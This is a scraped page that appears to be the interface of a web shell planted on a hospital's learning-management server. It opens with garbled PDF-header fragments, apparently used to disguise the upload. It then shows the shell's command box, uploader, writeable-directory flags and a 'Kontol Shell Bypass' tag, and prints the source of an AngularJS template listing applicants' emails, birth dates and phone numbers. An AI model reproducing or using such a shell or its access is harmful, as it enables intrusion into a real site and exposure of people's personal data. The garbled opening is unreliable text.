%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/lms/lms/views/leads/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/lms/lms/views/leads/leads_sent_emails.html
<style>
    .emailbodyleadspage p           {margin: 0;}
</style>
<div class="page-bar">
    <ul class="page-breadcrumb uc">
        <li><h2>Manage Sent Emails</h2></li>
    </ul>
    <div class="page-toolbar">
        <a ui-sref="manage-campaigns" class="btn btn-primary" ng-if="isAdmin">Manage Email Templates</a>
    </div>
</div>
<!-- -->

<div class="ng-vis-hid">
    <div class="tab-pane active" id="tab_1">
        <!-- Search -->
        <div class="form-group">
            <!-- <a href="" class="btn purple pull-right" ng-click="cr.exportLists()"><i class="fa fa-file-excel-o"></i> Export</a> -->
            <form ng-submit="cr.lists()">
                <fieldset>
                    <legend>Filter</legend>
                    <div class="p10">
                        <div class="form-inline fc-sm">
                            <input type="text" ng-model="cr.sdata.k" class="form-control w250" placeholder="Name, Email-ID, Mob, System ID" />
                            <select class="form-control m5" ng-model="cr.sdata.created_by" ng-if="cr.callers.length">
                                <option value="">Email Sent By (ALL)</option>
                                <option value="{{r.id}}" ng-repeat="r in cr.callers">{{r.name}}</option>
                            </select>
                            <input type="text" ng-model="cr.sdata.fromDate" class="form-control m5 w130 cal hasCal" placeholder="From Date" />
                            <input type="text" ng-model="cr.sdata.toDate" class="form-control m5 w130 cal hasCal" placeholder="To Date" />
                            
                            <select class="form-control m5" id="sdd_steps" multiple style="width:200px">
                                <option value="1">Step 1</option>
                                <option value="2">Step 2</option>
                                <option value="3">Step 3</option>
                            </select>

                            <select class="form-control m5" id="sdd_state_id" multiple style="width:300px">
                                <option value="{{r.id}}" ng-repeat="r in cr.states">{{r.title}}</option>
                            </select>

                            <select class="form-control m5" ng-model="cr.sdata.is_letter">
                                <option value="0">Emails</option>
                                <option value="1">Letters</option>
                            </select>
    
                            <button type="submit mb5" class="btn btn-info">Search</button>
                        </div>
                    </div>
                </fieldset>
            </form>
        </div>
        <!-- / -->

        <div ng-if="cr.result.length">
            <div class="text-secondary bold mb10">
                Showing {{cr.page.start+1}} - {{cr.page.start+cr.page.total}} of {{cr.page.total_records}} records.
            </div>
            <div class="table-responsive">
                <table class="table table-striped table-bordered table-advance tablemd">
                    <thead class="vmid uc">
                        <tr>
                            <th class="w20">SN</th>
                            <th class="w300">Applicant</th>
                            <th>Emails</th>
                        </tr>
                    </thead>
    
                    <tbody>
                        <tr ng-repeat="(i,r) in cr.result">
                            <td>{{i+cr.page.start+1}}.</td>
                            <td>
                                <div class="uc">{{r.name}}</div>
                                <div class="note-text pdT5">{{r.email}}</div>
                                <div class="note-text pdT3"><i class="fa fa-mobile"></i> {{r.mob}}</div>
                                <div class="note-text pdT3 uc">[{{r.state}}]</div>
                                <div class="note-text pdT3"><span class="inblock w100">System ID</span>: <strong>{{r.application_no}}</strong></div>
                                <div class="note-text pdT3"><span class="inblock w100">DOB</span>: <strong>{{r.dob}}</strong></div>
                                <div class="note-text pdT3"><span class="inblock w100">Father Name</span>: <strong>{{r.father_name}}</strong></div>
                                <div class="note-text pdT3"><span class="inblock w100">Acad. Career</span>: <strong>{{r.ac}}</strong></div>
                                <div class="note-text pdT3"><span class="inblock w100">Program</span>: <strong>{{r.program}}</strong></div>
                                <div class="note-text pdT3"><span class="inblock w100">Specialization</span>: <strong>{{r.plan}}</strong></div>
                                <div class="note-text pdT3"><span class="inblock w100">Step Completed</span>: <strong>{{r.step_completed}}</strong></div>
                                <div class="pt10">
                                    <button type="button" class="btn btn-xs btn-info" ng-click="cr.lead_detail(r.id)">View Lead Details</button>
                                </div>
                            </td>

                            <td>
                                <div class="table-responsive">
                                    <table class="table table-striped table-bordered table-advance tablesm nomrgn">
                                        <thead class="vmid uc">
                                            <tr>
                                                <th class="w20">SN</th>
                                                <th>Subject/Body</th>
                                                <th class="w100">Sent On</th>
                                                <th class="w150">Sent By</th>
                                            </tr>
                                        </thead>
                                        <tbody>
                                            <tr ng-repeat="(j,e) in r.sent_emails">
                                                <td>{{j+1}}.</td>
                                                <td>
                                                    {{e.subject}}
                                                    <div class="pt3 note-text emailbodyleadspage" ng-bind-html="renderHtml(e.body)"></div>
                                                    <div class="pdT5" ng-if="e.attachment_urls.length">
                                                        <a ng-repeat="(k,a) in e.attachment_urls" href="{{a}}" download="attachment" target="_self" class="inblock m3 text-danger"><i class="fa fa-paperclip"></i> Attachment{{k+1}}</a>
                                                    </div>
                                                </td>
                                                <td>{{e.created}}</td>
                                                <td>{{e.usr}} ({{e.usr_type}})</td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </div>
                            </td>
                        </tr>
                    </tbody>
                </table>
            </div>
            <div class="bold" ng-show="cr.page.total_pages>1">
                <div dir-paging fn="cr.lists" pageob="cr.page"></div>
            </div>
        </div>
        <div class="text-center text-default pd20" ng-if="!cr.result.length">No record found.</div>
    </div>
</div>

<!-- Lead Detail Modal -->
<div ng-include="'views/leads/lead_dtl.html?'+VERSION"></div>

Kontol Shell Bypass